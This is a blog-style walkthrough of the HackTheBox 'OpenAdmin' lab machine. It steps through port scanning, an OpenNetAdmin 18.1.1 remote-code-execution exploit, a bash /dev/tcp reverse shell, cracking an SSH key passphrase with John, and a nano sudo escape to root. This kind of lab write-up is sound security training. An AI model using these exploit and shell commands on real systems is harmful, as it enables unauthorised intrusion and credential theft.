I recently completed the OpenAdmin box from Hackthebox. While this box was rated as being easy it was a little tricky to get my footing and working around the box.
Command:
nmap -sC -sV -O -T4 -p- -oN nmap.txt 10.10.10.171
Ports Open:
- 22 OpenSSH 7.6p1, Is the main tool for connecting remote login with SSH. SSH encrypts all the traffic as well as providing Securing tunneling plus some other cool things.
- 80 Apache httpD 2.4.29, This is a free and open-source cross-platform web server. Mostly these servers run on Linux but some of the current/up-to-date ones run on Windows.
Being that I like messing around the website first I will skip over the first port and head directly over to the site.
So nothing too interesting here for me. So lets, fire up some Directory Busting tools.
Command:
dirb http://10.10.10.171/ -o dirb.txt
- -o = Will capture this in an output so if you want to clear your screen after it runs you can.
After some time we should get a pretty long list for directories found.
After getting the results we can now head over to the sites that were discovered. It appears to be some landing pages that don't provide too much information for us.
But after we get to the /music location it appears to be a login section which wasn't on the other sites.
Clicking on the login button should bring up a new page called /ona.
Searching on the page brings up the below User Info page. It shows us as being logged in as an guest and that the Database is running on mysqli.
Searching around some and we are able to find the version information.
v18.1.1
When typing ona v18.1.1 into Google, it provides us with the following.
OpenNetAdmin v18.1.1
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work.
Now that we have this key information let's check for any exploits on Kali that we can use for it.
Command:
searchsploit OpenNetAdmin
Let's go with the last one.
Command:
locate php/webapps/47691.sh
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh .
Command:
cat 47691.sh
The code above will push out a pseudo-shell for us.
Before running the code you will need to reformat it.
Command:
dos2unix 47691.sh
Command:
./47691.sh 10.10.10.171/ona/
This will bring up a limited shell on the machine. I decided to use another python script instead, so depending on what you want to do the option is yours.
Command:
wget https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py
Let's run the code to read the options:
Command:
python3 ona-rce.py
After running the script we get 2 options. One of which is to check if the victim is vulnerable and another one to exploit.
Command:
python3 ona-rce.py check http://10.10.10.171/ona/
Now off to the races.
Command:
python3 ona-rce.py exploit http://10.10.10.171/ona/
So I am the www-data user.
Let's get a better shell on the machine.
Command:
nc -nvlp 1234
Command:
/bin/bash -C 'bash -i >& /dev/tcp/tun0/1234 0>&1'
I am going to check around on the box for any hidden files, while doing this I come across the following 2 users.
After some additional searches on the box I come across the following password for the localhost.
Save these creds to a file.
Now review the file to make sure.
Command:
cat password
Remember that there was a SSH port open before. I am going to try and use the usernames we found with the password we just discovered to login.
Something should have stuck out to you. When I copied that Password to my file I left out the ! by accident. Make sure you are paying close attention to this when you are running on a box.
No try this again with the !.
Let's look at what is running here.
Command:
netstat -a
We can see that a localhost:52846.
While looking at this directory, I see a file called main.php.
I tried to cat it but didn't show much from there so I am going to use Curl with the knowledge that netstat showed there is something running here at the localhost port 52846.
Command:
Curl http://127.0.0.1:52846/main.php
We can see that there is a RSA Private Key here.
Let's copy and paste this into a new file.
Command:
echo > key
nano key
Then paste the code, CTRL+X then Yes to save it.
Verify the contents of file by Cat the file.
I am going to use JohntheRipper to crack this.
But first if you haven't already unziped the txt.gz, do the following.
Command:
cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls To verify that it worked.
Now let's run John!
Command:
sudo john --wordlist=/usr/share/wordlists/rockyou.txt key
So save this password somewhere for the future bloodninjas.
Heading back over to the box, I am going to continue to look through what additional files I can find.
Command:
cat index.php
We see that there is another password here and looks to be hashed with Sha512!.
Grab this and we will run it in the Crackstation to see if it has been cracked.
Now using the id_rsa file which should include your RSA key, lets use this and the newly found password to log into Joanna.
Command:
chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171
input passphrase
Command:
sudo -l
This shows that No password is needed when run from the /bin/nano /opt/priv.
Head over to GTFObins Link
and you see there is a way to spawn a root shell.
Using nano to open the /bin/nano /opt/priv file you will now edit it.
Command:
reset; sh 1>&0 2>&0
Top comments (0)